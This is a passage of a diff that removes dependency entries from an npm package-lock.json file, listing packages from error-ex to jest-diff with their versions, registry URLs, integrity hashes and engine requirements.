"https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", - "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "node_modules/extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=", - "engines": [ - "node >=0.6.0" - ] - }, - "node_modules/fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/filelist": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.4.tgz", - "integrity": "sha512-w1cEuf3S+DrLCQL7ET6kz+gmlJdbq9J7yXCSjK/OZCPA+qEN1WyF4ZAf0YYJa4/shHJra2t/d/r8SV4Ji+x+8Q==", - "dev": true, - "dependencies": { - "minimatch": "^5.0.1" - } - }, - "node_modules/filelist/node_modules/brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0" - } - }, - "node_modules/filelist/node_modules/minimatch": { - "version": "5.1.6", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", - "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", - "dev": true, - "dependencies": { - "brace-expansion": "^2.0.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/foreground-child": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.0.tgz", - "integrity": "sha512-Ld2g8rrAyMYFXBhEqMz8ZAHBi4J4uS1i/CxGMDnjyFWddMXLVcDp051DZfu+t7+ab7Wv6SMqpWmyFIj5UbfFvg==", - "dependencies": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/foreground-child/node_modules/signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=", - "engines": { - "node": "*" - } - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", - "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", - "dev": true, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", - "dependencies": { - "assert-plus": "^1.0.0" - } - }, - "node_modules/glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "deprecated": "Glob versions prior to v9 are no longer supported", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "node_modules/har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=", - "engines": { - "node": ">=4" - } - }, - "node_modules/har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "deprecated": "this library is no longer supported", - "dependencies": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/hasown": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", - "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.2" - }, - "engines": { - "node": ">= 0.4" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", - "dependencies": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - }, - "engines": { - "node": ">=0.8", - "npm": ">=1.3.7" - } - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/import-local": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.2.0.tgz", - "integrity": "sha512-2SPlun1JUPWoM6t3F0dw0FkCF/jWY8kttcY4f599GLTSjh2OCuuhdTkJQsEcZzBqbXZGKMK2OqW1oZsjtf/gQA==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "deprecated": "This module is not supported, and leaks memory. Do not use it. Check out lru-cache if you want a good and tested way to coalesce async requests by a key value, which is much more comprehensive and powerful.", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.15.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.15.1.tgz", - "integrity": "sha512-z0vtXSwucUJtANQWldhbtbt7BnL0vxiFjIdDLAatwhDYty2bad6s+rijD6Ri4YuYJubLzIJLUidCh09e1djEVQ==", - "dev": true, - "dependencies": { - "hasown": "^2.0.2" - }, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha1-6PvzdNxVb/iUehDcsFctYz8s+hA=" - }, - "node_modules/isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "peerDependencies": { - "ws": "*" - } - }, - "node_modules/isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.2", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.2.tgz", - "integrity": "sha512-O8dpsF+r0WV/8MNRKfnmrtCWhuKjxrq2w+jpzBL5UZKTi2LeVWnWOmWRxFlesJONmc+wLAGvKQZEOanko0LFTg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "6.0.3", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.3.tgz", - "integrity": "sha512-Vtgk7L/R2JHyyGW07spoFlB8/lpjiOLTjMdms6AFMraYt3BaJauod/NGrfnVG/y4Ix1JEuMRPDPEj2ua+zz1/Q==", - "dev": true, - "dependencies": { - "@babel/core": "^7.23.9", - "@babel/parser": "^7.23.9", - "@istanbuljs/schema": "^0.1.3", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^7.5.4" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-lib-instrument/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", - "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^4.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.7", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", - "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jackspeak": { - "version": "3.4.3", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", - "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", - "dependencies": { - "@isaacs/cliui": "^8.0.2" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - }, - "optionalDependencies": { - "@pkgjs/parseargs": "^0.11.0" - } - }, - "node_modules/jake": { - "version": "10.9.2", - "resolved": "https://registry.npmjs.org/jake/-/jake-10.9.2.tgz", - "integrity": "sha512-2P4SQ0HrLQ+fw6llpLnOaGAvN2Zu6778SJMrCUwns4fOoG9ayrTiZk3VV8sCPkVZF8ab0zksVpS8FDY5pRCNBA==", - "dev": true, - "dependencies": { - "async": "^3.2.3", - "chalk": "^4.0.2", - "filelist": "^1.0.4", - "minimatch": "^3.1.2" - }, - "bin": { - "jake": "bin/cli.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", - "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", - "dev": true, - "dependencies": { - "@jest/core": "^29.7.0", - "@jest/types": "^29.6.3", - "import-local": "^3.0.2", - "jest-cli": "^29.7.0" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", - "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", - "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^1.0.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.7.0", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0", - "pretty-format": "^29.7.0", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", - "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", - "dev": true, - "dependencies": { - "@jest/core": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "create-jest": "^29.7.0", - "exit": "^0.1.2", - "import-local": "^3.0.2", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", - "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-jest": "^29.7.0", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", - "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.6.3", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - 